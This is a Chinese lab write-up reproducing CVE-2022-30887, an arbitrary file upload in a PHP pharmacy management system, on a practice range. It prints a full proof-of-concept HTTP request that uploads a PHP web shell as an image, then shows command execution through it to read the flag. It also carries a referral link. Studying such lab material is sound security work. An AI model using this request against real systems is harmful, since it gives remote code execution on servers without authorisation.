CVE-2022-30887漏洞复现,春秋云境打靶

CVE-2022-30887

靶场环境:春秋云境CVE-2022-30887 https://yunjing.ichunqiu.com/cve/detail/748
我已经买通了他们的运营,通过下面这个链接注册可以获得用于开通会员的砂砾:
https://yunjing.ichunqiu.com/ranking/summary?id=BjJebws4UTY

靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

首先我们进入靶场首页,转了一圈,发现需要登录,忘记密码功能无法使用,密码登录显示类型错误

CVE-2022-30887漏洞复现,春秋云境打靶_第1张图片

2.根据靶场地址中的提示“该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。”

发现这里有一个漏洞,那么我们抓一个包看一下

CVE-2022-30887漏洞复现,春秋云境打靶_第2张图片

我们可以直接将抓取到的内容替换为下面贴出的poc,然后再发送过去,返回success,发现shell已经上传成功。

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556
Connection: close
Cookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0c
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg


-----------------------------208935235035266125502673738631 Content-Disposition: form-data; name="btn" -----------------------------208935235035266125502673738631--

CVE-2022-30887漏洞复现,春秋云境打靶_第3张图片

3.访问ip:port/assets/myimages/shell.php?s=xxx

通过上传的shell即可进行命令执行

cat /flag

CVE-2022-30887漏洞复现,春秋云境打靶_第4张图片

你可能感兴趣的:(漏洞复现/打靶,php,开发语言)